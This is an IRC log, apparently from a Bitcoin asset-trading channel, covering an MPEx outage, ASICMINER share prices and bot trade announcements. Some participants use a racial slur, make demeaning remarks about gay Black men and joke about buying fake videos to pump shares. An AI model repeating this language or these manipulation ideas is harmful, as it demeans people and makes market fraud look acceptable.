again Oct 27 19:57:04 <mircea_popescu> the pleasure is all mine. Oct 27 19:58:13 <mircea_popescu> raid drive 3 failed. Oct 27 19:58:22 <mircea_popescu> the thing will be back within minutes. Oct 27 19:58:31 <mike_c> raid.. 6? Oct 27 19:58:43 midnightmagic mike_c MiningBuddy mircea_popescu mius mixdio Oct 27 19:58:48 <mircea_popescu> mike_c it's 1+0 Oct 27 19:59:56 <mircea_popescu> anyway. normally it could have recovered on the fly, but now chief engineer wants to see why it failed right now, and i can't argue with her. Oct 27 20:00:20 <Kleeck_> You can't? Oct 27 20:00:26 <Kleeck_> I mean, I guess it is Sunday... Oct 27 20:01:03 <mircea_popescu> i just don;t have what with lol Oct 27 20:01:43 <dexX7> what if your sysadmin steals all teh coins? Oct 27 20:02:23 <mircea_popescu> sysadmin doesn't have any coins. Oct 27 20:02:38 <mike_c> that happened to gox 6 months ago and they're still ok Oct 27 20:03:11 <kakobrekla> by still ok you mean like "i used to have schizophrenia but we are ok now"? Oct 27 20:03:25 midnightmagic mike_c MiningBuddy mircea_popescu mius mixdio Oct 27 20:03:27 <mike_c> hehe. something like that. Oct 27 20:03:31 <mircea_popescu> mike_c 6 months ? wjhich one is this ? Oct 27 20:03:49 <mircea_popescu> you mean the old "consultant" that broke into their stuff back in 2011 ? Oct 27 20:04:08 <mircea_popescu> who iirc was actually the ex-owner, now ripple guy ? Oct 27 20:04:13 <jurov> happened also to bitfloor, they are not okay Oct 27 20:04:36 <jurov> but i guess mircea knows better than leaving unencrypted wallets lying around Oct 27 20:04:54 <kakobrekla> thats just speculation! Oct 27 20:04:57 <mircea_popescu> i keep all my wallets encrypted in temporary amazon sessions Oct 27 20:04:59 <mircea_popescu> like that guy Oct 27 20:05:05 <kakobrekla> see. Oct 27 20:05:30 <dexX7> https://bitcointalk.org/index.php?topic=99497.msg3422086#msg3422086 Oct 27 20:05:32 <ozbot> ASICMINER: Entering the Future of ASIC Mining by Inventing It Oct 27 20:05:36 <asciilifeform> hotwallets aren't entirely useless. they make perfectly decent honeypots for crapware analysis. Oct 27 20:05:37 <dexX7> am financials Oct 27 20:05:57 <mircea_popescu> dexX7 how;d they do ? Oct 27 20:06:08 <mircea_popescu> asciilifeform probably why kakobrekla insists on having one on bitbet Oct 27 20:06:44 <kakobrekla> maybe. Oct 27 20:07:37 <dexX7> well, i don't know. i have no reference to say "it's good or bad" Oct 27 20:07:40 <assbot> [HAVELOCK] [AM100] 23 @ 0.00796 = 0.1831 BTC [-] {2} Oct 27 20:08:05 <kakobrekla> wait and see if stock drops Oct 27 20:08:09 <kakobrekla> :p Oct 27 20:08:11 <mircea_popescu> so you know they did good then ? Oct 27 20:08:33 <dexX7> haha what kakaobrekla said Oct 27 20:08:42 <dexX7> no, i see numbers, but i can't "rate" them Oct 27 20:09:05 <kakobrekla> let me introduce you to the powers of tab autocomplete dexX7 Oct 27 20:09:15 <dexX7> kakobrekla Oct 27 20:09:16 <dexX7> :) Oct 27 20:09:19 <mircea_popescu> kakao brekla! Oct 27 20:09:22 <kakobrekla> just sayin. Oct 27 20:09:30 <dexX7> hehe ty Oct 27 20:09:34 <mircea_popescu> dexX7 so just summarize the numbers ? Oct 27 20:09:54 <dexX7> https://docs.google.com/spreadsheet/ccc?key=0Al1fvFT7Sd5bdDlHek0tem01M2IzSnhDUjBHbWI4dmc&usp=sharing + https://docs.google.com/spreadsheet/ccc?key=0Al1fvFT7Sd5bdDh0enIxT0pycEVkZ2h6TE1BZ0dZd0E&usp=sharing Oct 27 20:09:55 <ozbot> Google Drive Oct 27 20:11:37 <kakobrekla> Owner's Equity 5484.66 Oct 27 20:11:52 <kakobrekla> this is what it is or what Oct 27 20:12:01 <kakobrekla> never looked at am report before Oct 27 20:12:45 <assbot> [HAVELOCK] [AM100] 16 @ 0.00796 = 0.1274 BTC [-] Oct 27 20:13:46 <assbot> [HAVELOCK] [AM100] 50 @ 0.00795001 = 0.3975 BTC [-] Oct 27 20:13:47 <assbot> [HAVELOCK] [AM1] 15 @ 0.81394 = 12.2091 BTC [-] {5} Oct 27 20:14:00 <kakobrekla> aparently its bad! Oct 27 20:14:08 <Kleeck_> lol Oct 27 20:14:39 <mircea_popescu> they just won't move to an0 already would they ;/ Oct 27 20:14:51 <mircea_popescu> people keep publishing fundamentally meaningless reports cause why not, it's coo Oct 27 20:15:03 <kakobrekla> what reports Oct 27 20:15:22 <mike_c> hm, but i thought am went from 0.5 -> 0.8 the other day because the chinese video said he's getting a bunch of new hardware. Oct 27 20:15:42 <kakobrekla> i can do somalian video saying hes getting shit. Oct 27 20:15:43 <dexX7> well, gen2 nre costs are already payed Oct 27 20:15:48 <assbot> [HAVELOCK] [AM100] 52 @ 0.00794811 = 0.4133 BTC [-] {2} Oct 27 20:15:50 <mircea_popescu> paid! Oct 27 20:15:53 <mike_c> yes, then it would break 1 Oct 27 20:15:55 <dexX7> oh oh oh Oct 27 20:15:58 <dexX7> shame on me Oct 27 20:16:00 <dexX7> yes Oct 27 20:16:37 <mircea_popescu> how much were gen2 nre costs, and wasn;'t there a gen3 that's supposed to be where the real hash comes from ? Oct 27 20:17:50 <assbot> [HAVELOCK] [AM1] 13 @ 0.79976923 = 10.397 BTC [-] {3} Oct 27 20:17:51 <mike_c> kakobrekla: that is actually a great idea. i bet we could make that happen on fiverr. it would be hilarious. Oct 27 20:17:54 <dexX7> $ 210k Oct 27 20:18:10 <kakobrekla> fiver? Oct 27 20:18:22 <mike_c> yeah, you can pay poor people $5 to do anything. Oct 27 20:18:39 <dexX7> i think the chinese guy fooled some with the video.. it was like "friedcat will bring 1000 th/s online on nov 7" and two hours later "i forgot to say that he actually said that am delievered 1000 th/s in sold products altogether" Oct 27 20:18:52 <kakobrekla> i can get black powder for 3$ and pocket 2. Oct 27 20:19:03 <Kleeck_> Hey. I made some coin off of the hype. I'll take it. :) Oct 27 20:19:15 <mike_c> but that wouldn't spook the bitcointalk crowd into pumping AM shares Oct 27 20:19:22 <Kleeck_> ^ Oct 27 20:19:55 <kakobrekla> well tbh by 'getting shit' i ment getting shit, meaning nothing, originally but hey whats stopping you from going the other way Oct 27 20:20:39 <kakobrekla> make like 50 of them if they are so cheap Oct 27 20:24:57 <assbot> [HAVELOCK] [AM100] 100 @ 0.0078524 = 0.7852 BTC [-] {3} Oct 27 20:25:12 <lurker> weeeeeeeeeeeeeeeeeee Oct 27 20:26:05 <jurov> ;;seen Namworld Oct 27 20:26:05 <gribble> Namworld was last seen in #bitcoin-assets 1 week, 0 days, 9 hours, 57 minutes, and 20 seconds ago: <Namworld> Nope Oct 27 20:26:11 <jurov> :( Oct 27 20:27:45 <pankkake> great last words Oct 27 20:27:48 <pankkake> ;;seen burnside Oct 27 20:27:49 <gribble> burnside was last seen in #bitcoin-assets 13 weeks, 3 days, 23 hours, 52 minutes, and 21 seconds ago: <burnside> lol Oct 27 20:29:01 <assbot> [HAVELOCK] [B] [XBOND] 450 @ 0.00111212 = 0.5005 BTC [-] {2} Oct 27 20:41:14 <kakobrekla> they all seem to do that Oct 27 20:41:17 <kakobrekla> ;;seen nefario Oct 27 20:41:17 <gribble> nefario was last seen in #bitcoin-assets 1 year, 4 weeks, 4 days, 22 hours, 41 minutes, and 3 seconds ago: <nefario> Those assets are not listed or traded anymore Oct 27 20:46:18 <assbot> [HAVELOCK] [B] [XBOND] 400 @ 0.00114784 = 0.4591 BTC [+] {2} Oct 27 20:47:19 <assbot> [HAVELOCK] [AM1] 1 @ 0.79 BTC [-] Oct 27 20:48:20 <assbot> [HAVELOCK] [AM1] 3 @ 0.774 = 2.322 BTC [-] {2} Oct 27 20:50:16 <jurov> ;;seens smickles Oct 27 20:50:16 <gribble> Error: "seens" is not a valid command. Oct 27 20:50:19 <jurov> ;;seen smickles Oct 27 20:50:20 <gribble> smickles was last seen in #bitcoin-assets 4 weeks, 0 days, 1 hour, 40 minutes, and 44 seconds ago: <smickles> ;D Oct 27 20:50:23 <assbot> [HAVELOCK] [AM100] 112 @ 0.00765284 = 0.8571 BTC [-] {10} Oct 27 20:53:27 <assbot> [HAVELOCK] [AM1] 1 @ 0.745 BTC [-] Oct 27 20:54:26 <assbot> [HAVELOCK] [AM100] 200 @ 0.00711058 = 1.4221 BTC [-] {9} Oct 27 20:56:28 <assbot> [HAVELOCK] [AM100] 84 @ 0.00700946 = 0.5888 BTC [-] {3} Oct 27 20:57:29 <assbot> [HAVELOCK] [AM100] 116 @ 0.007 = 0.812 BTC [-] {2} Oct 27 20:58:30 <assbot> [HAVELOCK] [AM100] 638 @ 0.007 = 4.466 BTC [-] {4} Oct 27 20:59:31 <assbot> [HAVELOCK] [AM100] 94 @ 0.006802 = 0.6394 BTC [-] Oct 27 21:00:32 <assbot> [HAVELOCK] [AM1] 2 @ 0.75 = 1.5 BTC [+] Oct 27 21:02:34 <assbot> [HAVELOCK] [AM1] 1 @ 0.7280001 BTC [-] Oct 27 21:07:39 <assbot> [HAVELOCK] [AM1] 3 @ 0.728 = 2.184 BTC [-] Oct 27 21:08:35 <smidge> ;;market buy 10000 Oct 27 21:08:36 <gribble> A market order to buy 10000 bitcoins right now would take 2136953.7990 USD and would take the last price up to 223.7812 USD, resulting in an average price of 213.6954 USD/BTC. | Data vintage: 0.0013 seconds Oct 27 21:08:40 <assbot> [HAVELOCK] [AM1] 1 @ 0.727 BTC [-] Oct 27 21:11:43 <assbot> [HAVELOCK] [AM1] 2 @ 0.7115 = 1.423 BTC [-] {2} Oct 27 21:12:44 <assbot> [HAVELOCK] [AM1] 1 @ 0.679 BTC [-] Oct 27 21:13:45 <assbot> [HAVELOCK] [AM100] 70 @ 0.006802 = 0.4761 BTC [-] Oct 27 21:13:46 <assbot> [HAVELOCK] [AM1] 16 @ 0.665 = 10.64 BTC [-] {6} Oct 27 21:14:46 <assbot> [HAVELOCK] [AM100] 135 @ 0.006802 = 0.9183 BTC [-] {2} Oct 27 21:14:47 <assbot> [HAVELOCK] [AM1] 4 @ 0.66 = 2.64 BTC [-] Oct 27 21:17:48 <assbot> [HAVELOCK] [AM100] 548 @ 0.00680152 = 3.7272 BTC [-] {4} Oct 27 21:24:09 <nubbins`> i consumed a large amount of alcohol last night Oct 27 21:25:22 <jurov> nubbins`: what kind of? Oct 27 21:25:47 <nubbins`> pale lager Oct 27 21:28:01 <jurov> https://coinbr.com/about Slashed fees since November 1!!! Oct 27 21:28:03 <ozbot> About CoinBr Oct 27 21:29:09 <nubbins`> slashed indeed Oct 27 21:29:57 <mike_c> good move. Oct 27 21:35:47 <jurov> btw, it had 1 year anniversary :) feels like much longer time in btc Oct 27 21:35:57 <mike_c> congrats! Oct 27 21:37:23 <jurov> thx Oct 27 21:37:37 <pankkake> pretty cool :) so it will be effective on the 1st (i.e. should I wait to use it)? Oct 27 21:39:50 <pankkake> !ticker m s.mg Oct 27 21:39:51 <assbot> Some are born to endless night. Oct 27 21:40:00 <pankkake> okay Oct 27 21:40:10 <assbot> [HAVELOCK] [AM100] 150 @ 0.00652944 = 0.9794 BTC [-] {6} Oct 27 21:40:11 <assbot> [HAVELOCK] [AM1] 50 @ 0.65440052 = 32.72 BTC [-] {6} Oct 27 21:40:15 <mike_c> heh. mpex is down, maybe that's why. Oct 27 21:40:48 <jurov> no, on 1st we'll ask only 0.19 or less (if you register now, you'll pay only for 5 days) Oct 27 21:40:58 <jurov> 0.019 sry Oct 27 21:41:07 <pankkake> indeed, what an amateurish service! Oct 27 21:41:19 <pankkake> well I have an account already (with nothing on it) Oct 27 21:43:13 <jurov> if you act quickly, you can catch s.mpoe dividends ;) Oct 27 21:43:39 <pankkake> do you support Armory signatures for widthdrawal? it seems they are not the same as the main client Oct 27 21:44:14 <assbot> [HAVELOCK] [AM1] 3 @ 0.6500005 = 1.95 BTC [-] Oct 27 21:44:50 <jurov> were you trying them? they may not be different, just some bugs, esp. with longer texts Oct 27 21:45:28 <jurov> electrum fixed that some month ago, armory should be too Oct 27 21:45:46 <pankkake> oh, ok. only something I read Oct 27 21:46:32 <pankkake> anyway I can always export the keys and sign it some other way Oct 27 21:47:13 <jurov> try and let me know. i want to have it working with armory, too Oct 27 21:48:06 <jurov> last time i tried, it refused to start, did not put more effort into it Oct 27 21:48:32 <pankkake> well, it requires 6G of ram currently :/ Oct 27 21:49:45 <pankkake> now I hope bitvps goes back to mpex! Oct 27 21:51:09 <kakobrekla> armory meh Oct 27 21:51:16 <kakobrekla> coin control ftw Oct 27 21:54:58 <jurov> ;;ticker Oct 27 21:54:58 <gribble> MtGox BTCUSD ticker | Best bid: 202.00000, Best ask: 202.00500, Bid-ask spread: 0.00500, Last trade: 202.00500, 24 hour volume: 10070.43002790, 24 hour low: 187.02000, 24 hour high: 204.50000, 24 hour vwap: 196.64402 Oct 27 21:55:10 <jurov> welcome back @200 Oct 27 21:55:13 <mike_c> let the bubble resume Oct 27 21:56:40 <benkay> goodness Oct 27 22:03:32 <nubbins`> huh Oct 27 22:04:39 <nubbins`> ;;ticker --market all Oct 27 22:04:55 <nubbins`> ... Oct 27 22:05:05 <gribble> MtGox BTCUSD last: 205.00000, vol: 10861.55696460 | BTC-E BTCUSD last: 184.639, vol: 13278.41497 | Bitfinex BTCUSD last: 196.99, vol: 3478.53293698 | CampBX BTCUSD last: 179.49, vol: 352.23338254 | Volume-weighted last average: 194.016724306 Oct 27 22:05:59 <pankkake> hm, so Armory signature didn't work, but brainwallet.org's did work Oct 27 22:06:20 <pankkake> armory gives a raw signature, it seems, while brainwallet gave me something that is obviously base64 Oct 27 22:11:42 <assbot> [HAVELOCK] [CBTC] 1000 @ 0.000168 = 0.168 BTC [+] Oct 27 22:14:45 <assbot> [HAVELOCK] [AM100] 500 @ 0.0061891 = 3.0946 BTC [-] {15} Oct 27 22:15:46 <assbot> [HAVELOCK] [AM100] 100 @ 0.00614499 = 0.6145 BTC [-] {2} Oct 27 22:18:49 <assbot> [HAVELOCK] [AM100] 96 @ 0.00605745 = 0.5815 BTC [-] {3} Oct 27 22:19:50 <assbot> [HAVELOCK] [AM100] 4660 @ 0.00530594 = 24.7257 BTC [-] {27} Oct 27 22:20:51 <assbot> [HAVELOCK] [AM100] 975 @ 0.005 = 4.875 BTC [-] {3} Oct 27 22:21:52 <assbot> [HAVELOCK] [AM100] 174 @ 0.00499998 = 0.87 BTC [-] {2} Oct 27 22:22:53 <assbot> [HAVELOCK] [AM100] 4526 @ 0.00499999 = 22.63 BTC [+] {2} Oct 27 22:23:54 <assbot> [HAVELOCK] [AM100] 229 @ 0.005 = 1.145 BTC [+] Oct 27 22:23:55 <assbot> [HAVELOCK] [AM1] 50 @ 0.63760003 = 31.88 BTC [-] {4} Oct 27 22:25:28 <davout> mircea_popescu: http://www.downforeveryoneorjustme.com/mpex.co Oct 27 22:25:56 <assbot> [HAVELOCK] [AM100] 40 @ 0.00689373 = 0.2757 BTC [+] {2} Oct 27 22:26:13 <jurov> hi davout, read the log. apparently raid issue Oct 27 22:28:59 <assbot> [HAVELOCK] [CFIG] 1 @ 0.1777 BTC [+] Oct 27 22:29:58 <jurov> lol, the association emerged: "nsa raid" Oct 27 22:33:01 <nubbins`> MPEX DOWN, NSA RAID SUSPECTED Oct 27 22:33:23 <Azelphur> THEY'RE WATCHING US NOW Oct 27 22:33:33 <kakobrekla> thes is No Such rAid. Oct 27 22:34:47 <davout> failing last they said Oct 27 22:34:56 <kakobrekla> failing last, twice. Oct 27 22:39:36 <pankkake> do it like openbsd: "Only two remote holes in the default install, in a heck of a long time!" Oct 27 22:39:58 <pankkake> they used to state years I think Oct 27 22:40:28 <asciilifeform> sorta like those 'X days without fatal accident!' scoreboards they used to have at construction sites. Oct 27 22:43:44 <mike_c> jurov, this is still up, but I assume should not be relied on? http://mpex.coinbr.com/ Oct 27 22:43:54 <jurov> that's cached Oct 27 22:44:12 <jurov> if you try to submit stuff, you'll get timeout Oct 27 22:44:18 <mike_c> k, thanks. Oct 27 22:45:15 <assbot> [HAVELOCK] [AM1] 5 @ 0.62 = 3.1 BTC [-] Oct 27 22:51:20 <assbot> [HAVELOCK] [AM1] 10 @ 0.61 = 6.1 BTC [-] Oct 27 22:55:24 <assbot> [HAVELOCK] [AM1] 1 @ 0.63 BTC [+] Oct 27 23:01:30 <assbot> [HAVELOCK] [AM1] 1 @ 0.6101 BTC [-] Oct 27 23:02:31 <assbot> [HAVELOCK] [AM1] 1 @ 0.61 BTC [-] Oct 27 23:06:01 <nubbins`> 5 days without fatal accident! Oct 27 23:06:11 <nubbins`> definitely worthy of a ! Oct 27 23:14:43 <assbot> [HAVELOCK] [AM1] 1 @ 0.608 BTC [-] Oct 27 23:16:45 <assbot> [HAVELOCK] [AM1] 1 @ 0.6079798 BTC [-] Oct 27 23:19:48 <assbot> [HAVELOCK] [NEOBEE] 400 @ 0.002585 = 1.034 BTC [-] {2} Oct 27 23:30:59 <assbot> [HAVELOCK] [AM1] 1 @ 0.61 BTC [+] Oct 27 23:31:06 <thestringpuller> moomba Oct 27 23:31:11 <thestringpuller> roomba Oct 27 23:31:15 <thestringpuller> zumba Oct 27 23:31:40 <pankkake> dj roomba Oct 27 23:31:52 <kakobrekla> #bitcoin-karaoke is next door btw. Oct 27 23:32:52 <jurov> it's closed Oct 27 23:33:01 <assbot> [HAVELOCK] [AM1] 2 @ 0.6065 = 1.213 BTC [-] Oct 27 23:33:50 <benkay> no sauna Oct 27 23:34:02 <assbot> [HAVELOCK] [AM1] 18 @ 0.60594444 = 10.907 BTC [-] {3} Oct 27 23:34:15 <jurov> /join #bitcoin-sauna Oct 27 23:34:30 <pankkake> well, we have no saunas, but we have POOLS Oct 27 23:34:38 <jurov> we have boiler rooms Oct 27 23:34:44 <VanCleef> /join #fuckfriedcat Oct 27 23:35:03 <assbot> [HAVELOCK] [HIM] 35 @ 0.07263999 = 2.5424 BTC [-] {3} Oct 27 23:35:05 <pankkake> necrozoophilia? Oct 27 23:36:04 <assbot> [HAVELOCK] [AM1] 3 @ 0.60020001 = 1.8006 BTC [-] Oct 27 23:37:31 <thestringpuller> is mpex back yet? Oct 27 23:37:41 <thestringpuller> json stat be broked yo Oct 27 23:38:06 <assbot> [HAVELOCK] [AM1] 1 @ 0.6002 BTC [-] Oct 27 23:38:09 <jurov> no, there's nsa raid Oct 27 23:38:58 <pankkake> mircea_popescu is waterboarded right now Oct 27 23:39:09 <pankkake> give up the key! Oct 27 23:41:30 <mike_c> sorry, key was stored on prototype cardano and is inaccessible Oct 27 23:44:38 <thestringpuller> mpex has been hacked!!!!! Oct 27 23:44:42 <thestringpuller> spread the news Oct 27 23:44:45 <thestringpuller> sell sell sell sell Oct 27 23:45:26 <pankkake> well you can't. clever! Oct 27 23:45:55 <pankkake> actually all latest mpex trades are mpoe buys. must have been rigged Oct 27 23:46:14 <assbot> [HAVELOCK] [AM1] 3 @ 0.60020001 = 1.8006 BTC [+] Oct 27 23:46:26 <jurov> we can make trade manually in between us, to be settled when mpex goes online Oct 27 23:46:38 <kakobrekla> ;;later tell mircea_popescu you forgot to turn off fake vol bot again ... Oct 27 23:46:39 <gribble> The operation succeeded. Oct 27 23:46:44 <jurov> i'm buying s.mpoe at 0.00001, anyone? Oct 27 23:46:46 <kakobrekla> oh that was suppose to be private. Oct 27 23:47:15 <assbot> [HAVELOCK] [AM1] 11 @ 0.60007271 = 6.6008 BTC [-] {4} Oct 27 23:48:17 <assbot> [HAVELOCK] [HIM] 2 @ 0.0644 = 0.1288 BTC [-] {2} Oct 27 23:49:10 <jurov> i don't see any such trades... or assbot censors them now? Oct 27 23:50:19 <assbot> [HAVELOCK] [NEOBEE] 96 @ 0.002729 = 0.262 BTC [+] Oct 27 23:50:20 <assbot> [HAVELOCK] [CFIG] 2 @ 0.1777 = 0.3554 BTC [+] Oct 27 23:53:04 <pankkake> oh, so mpex is kind of already p2p? Oct 27 23:53:33 <kakobrekla> what who censors? Oct 27 23:53:40 <kakobrekla> assbot censors if vol sub 0.1 Oct 27 23:54:04 <pankkake> #bitcoin-assets-trades for all Oct 27 23:54:16 <jurov> it includes the fake ones? Oct 27 23:54:23 <kakobrekla> yes even the fakes Oct 27 23:56:39 <thestringpuller> why are fake trades announced? Oct 27 23:56:50 <thestringpuller> http://drakethetype.tumblr.com/ Oct 27 23:56:51 <ozbot> Drake the type... Oct 27 23:58:44 <benkay> oh yes Oct 28 00:00:52 <benkay> drake the type of nigga to safely eject a usb stick Oct 28 00:01:17 <kakobrekla> what did this drake fella do to deserve this? Oct 28 00:01:38 <benkay> this for starters: http://25.media.tumblr.com/0d090af1bcf9b06b11b137a86e35d860/tumblr_mugjnb6V4X1sczgpmo1_1280.jpg Oct 28 00:02:20 <kakobrekla> the dude thats waveing? Oct 28 00:02:31 <benkay> yeah Oct 28 00:02:33 <benkay> it's a long story Oct 28 00:02:37 <benkay> it starts with degrassi Oct 28 00:02:38 <benkay> https://www.youtube.com/watch?v=tY5TfSnN8qY Oct 28 00:02:39 <ozbot> Drake On Degrassi - YouTube Oct 28 00:02:44 <kakobrekla> so he likes to get in in the ass, whats the big deal Oct 28 00:03:12 <benkay> big nono in black american culture Oct 28 00:03:31 <assbot> [HAVELOCK] [AM100] 35 @ 0.0061998 = 0.217 BTC [+] {2} Oct 28 00:04:47 <kakobrekla> just to clearify, 'nigger' culture or black american culture? Oct 28 00:06:32 <benkay> both imho Oct 28 00:06:41 <benkay> being that most gay black men tend to join the gay community Oct 28 00:06:49 <benkay> gay black community is like Oct 28 00:06:51 <benkay> rounding error Oct 28 00:07:27 <benkay> not that i even know what a 'nigger' is Oct 28 00:07:38 <benkay> if i knew what that word meant i'd have a mob at my door i think Oct 28 00:07:55 <benkay> i'll just blithely claim ignorance Oct 28 00:08:09 <kakobrekla> hehe ok Oct 28 00:09:31 <jurov> perhaps dub should say Oct 28 00:10:32 <jurov> ;;seen dub Oct 28 00:10:32 <gribble> dub was last seen in #bitcoin-assets 2 days, 0 hours, 30 minutes, and 41 seconds ago: <dub> dexX7: fucken chemtrails Oct 28 00:10:43 <jurov> D: Oct 28 00:10:45 <kakobrekla> they got to him. Oct 28 00:10:57 <kakobrekla> dub got got. Oct 28 00:13:13 <jurov> i'd rather retreat into darkest corner of my lair and await my fate...cya Oct 28 00:15:41 <kakobrekla> cya Oct 28 00:17:45 <assbot> [HAVELOCK] [AM1] 28 @ 0.59017858 = 16.525 BTC [-] {3} Oct 28 00:17:46 <assbot> [HAVELOCK] [AM100] 71 @ 0.00619982 = 0.4402 BTC [+] {2} Oct 28 00:30:48 <pankkake> perhaps they're dead Oct 28 00:35:01 <assbot> [HAVELOCK] [CBTC] 9200 @ 0.00017 = 1.564 BTC [+] Oct 28 00:36:53 <thestringpuller> FREE AT LAST FREE AT LAST Oct 28 00:42:03 <thestringpuller> ;;seen mod6 Oct 28 00:42:03 <gribble> mod6 was last seen in #bitcoin-assets 20 hours, 9 minutes, and 43 seconds ago: <mod6> watcha been up to thestringpuller? Oct 28 00:42:11 <mod6> werd up Oct 28 00:42:38 <thestringpuller> what happenes november 1st? Oct 28 00:42:46 <thestringpuller> oh dmc Oct 28 00:55:21 <assbot> [HAVELOCK] [AM1] 16 @ 0.591 = 9.456 BTC [+] Oct 28 01:02:28 <assbot> [HAVELOCK] [HIM] 19 @ 0.05580531 = 1.0603 BTC [-] {2} Oct 28 01:06:32 <assbot> [HAVELOCK] [HIM] 95 @ 0.05135188 = 4.8784 BTC [-] {6} Oct 28 01:46:16 <Vexual> are they 80bytes a step towards placating us regulators? Oct 28 01:59:39 <KRS1> wut Oct 28 02:06:32 <Vexual> the foundation had a sit down with some irrelevant bureaucrats Oct 28 02:12:29 <Vexual> i'd like to imagine they are selling it as a feature, and teaching the less relevant party to fail at chess in their first and only game Oct 28 02:17:10 <pankkake> I just got a silly job offer, feels like a spam Oct 28 02:17:30 <pankkake> "An opportunity to join the most famous & successful website in the world today - Dublin €50-60K + Bens" Oct 28 02:17:54 <Vexual> dublin eh? Oct 28 02:18:00 <pankkake> Are you a rockstar Web Developer with superb programming skills in a range of open source technologies? Would you like to work for the most famous and successful website in the world today? Oct 28 02:18:17 <pankkake> "Java, J2EE, PHP, LAMP, Javascript or Objective C" I'd rather kill myself Oct 28 02:18:21 <Vexual> good luck in dublin froggy Oct 28 02:18:31 <pankkake> I'm not much of a frog :) Oct 28 02:18:31 <kakobrekla> when i see "rockstar" i say "fuckyou" Oct 28 02:18:51 <pankkake> HR people who try to appeal to "geeks" are annoying Oct 28 02:20:00 <kakobrekla> olol Oct 28 02:20:07 <kakobrekla> to bbet email> Excuse me but your buy shares button is broken. I would like to purchase some. Oct 28 02:20:20 <Vexual> whats 50k euro in real money? Oct 28 02:20:20 <kakobrekla> what are the chances. Oct 28 02:20:40 <pankkake> I wouldn't mind an opportunity to get out of France though Oct 28 02:21:56 <pankkake> Vexual: about 350 BTC Oct 28 02:22:16 <kakobrekla> ;;bc,convert eur Oct 28 02:22:17 <gribble> 1 BTC = 205.00000 U.S. dollars = 148.475411 Euros Oct 28 02:22:27 <kakobrekla> ;;calc 50/0.15 Oct 28 02:22:27 <gribble> 333.333333333 Oct 28 02:22:44 <pankkake> real EUR, not mtgoxEUR :) Oct 28 02:22:47 <Vexual> I wonder if you can drink guiness at work? Oct 28 02:22:49 <kakobrekla> :) Oct 28 02:23:23 <pankkake> I don't really like Guiness. Unlike women I like blondes better Oct 28 02:24:50 <Vexual> well rockstars drink what they like Oct 28 02:25:10 <Vexual> and turn up to appointments late in leather pants with no shirt on Oct 28 02:26:08 <pankkake> lol Oct 28 02:29:54 <assbot> [HAVELOCK] [AM100] 100 @ 0.00600499 = 0.6005 BTC [-] {2} Oct 28 02:32:57 <assbot> [HAVELOCK] [B] [XBOND] 450 @ 0.00114784 = 0.5165 BTC [+] Oct 28 02:40:04 <assbot> [HAVELOCK] [NEOBEE] 260 @ 0.00272995 = 0.7098 BTC [+] {2} Oct 28 02:41:05 <assbot> [HAVELOCK] [NEOBEE] 843 @ 0.00272997 = 2.3014 BTC [+] Oct 28 02:56:06 <mircea_popescu> <kakobrekla> what are the chances. << bout 80% i guess Oct 28 02:56:42 <kakobrekla> lol Oct 28 02:56:45 <kakobrekla> irlol. Oct 28 02:57:40 <mircea_popescu> anyway. the fsck is complete, the drives are fine, the failure was due to cosmic rays. Oct 28 02:58:05 <mircea_popescu> sent the pcb in the dead one to be cut apart, i'll have the results in a coupla weeks, i don't expect to see anything. Oct 28 03:11:35 <assbot> [HAVELOCK] [VTX] 6 @ 0.31500017 = 1.89 BTC [+] {5} Oct 28 03:11:46 <Vexual> those cosmic rays are a bitch Oct 28 03:12:36 <assbot> [HAVELOCK] [VTX] 1 @ 0.31500017 BTC [+] Oct 28 03:14:31 <Apocalyptic> not sure if serious or joking Oct 28 03:14:56 <mircea_popescu> i dunno, i never met a cosmic ray. Oct 28 03:15:33 <Vexual> you've known gadzillionz intimately billions Oct 28 03:15:37 <Apocalyptic> of course you did mircea_popescu, they penetrate you everyday Oct 28 03:15:51 <mircea_popescu> raep Oct 28 03:17:04 <Vexual> you can get anything you want at alices resturant Oct 28 03:28:52 <assbot> [HAVELOCK] [AM1] 16 @ 0.58237506 = 9.318 BTC [-] {5} Oct 28 03:54:59 <Vexual> whats the craic nubbins`? Oct 28 03:56:41 <nubbins`> not much Oct 28 03:56:45 <nubbins`> ink shopping Oct 28 03:59:21 <assbot> [HAVELOCK] [AM1] 1 @ 0.65 BTC [+] Oct 28 03:59:22 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.00272996 = 0.273 BTC [-] Oct 28 03:59:37 <Vexual> wild Oct 28 04:01:05 <Vexual> does anyone have thousghts on 0.9? Oct 28 04:05:16 <KRS1> wut Oct 28 04:06:16 <Vexual> are you smoking funny cigarettes krs1? Oct 28 04:06:29 <assbot> [HAVELOCK] [B] [XBOND] 319 @ 0.00111937 = 0.3571 BTC [-] {4} Oct 28 04:07:29 <assbot> [HAVELOCK] [B] [XBOND] 750 @ 0.00110064 = 0.8255 BTC [-] {8} Oct 28 04:10:16 <Vexual> sideways soup analysis in full effect Oct 28 04:14:36 <assbot> [HAVELOCK] [B] [XBOND] 94 @ 0.0011 = 0.1034 BTC [-] {2} Oct 28 04:16:38 <assbot> [HAVELOCK] [AM1] 1 @ 0.5612 BTC [-] Oct 28 04:17:39 <assbot> [HAVELOCK] [B] [XBOND] 2611 @ 0.00107258 = 2.8005 BTC [-] {9} Oct 28 04:18:40 <assbot> [HAVELOCK] [B] [XBOND] 1225 @ 0.00106 = 1.2985 BTC [-] {2} Oct 28 04:21:00 <thestringpuller> smokin on dat dro Oct 28 04:21:05 <thestringpuller> where beeeee mpex at yo? Oct 28 04:24:02 <nubbins`> dro Oct 28 04:24:46 <assbot> [HAVELOCK] [B] [XBOND] 1875 @ 0.00106 = 1.9875 BTC [-] Oct 28 04:25:20 <mircea_popescu> hehe. iiiit wooooont be loooong now Oct 28 04:26:08 <Vexual> http://www.youtube.com/watch?v=rKTUAESacQM Oct 28 04:26:08 <ozbot> The Sugar Hill Gang - Rapper's Delight ( HQ, Full Version ) - YouTube Oct 28 04:26:48 <assbot> [HAVELOCK] [NEOBEE] 50 @ 0.00272997 = 0.1365 BTC [+] Oct 28 04:28:24 <nubbins`> mircea_popescu, thestringpuller: http://www.youtube.com/watch?v=UUBkEuxhgIU Oct 28 04:30:52 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.00272997 = 0.273 BTC [+] {2} Oct 28 04:31:53 <assbot> [HAVELOCK] [VTX] 2 @ 0.31500017 = 0.63 BTC [+] Oct 28 04:33:55 <assbot> [HAVELOCK] [CFIG] 3 @ 0.1777 = 0.5331 BTC [+] Oct 28 04:34:56 <assbot> [HAVELOCK] [CFIG] 3 @ 0.178 = 0.534 BTC [+] Oct 28 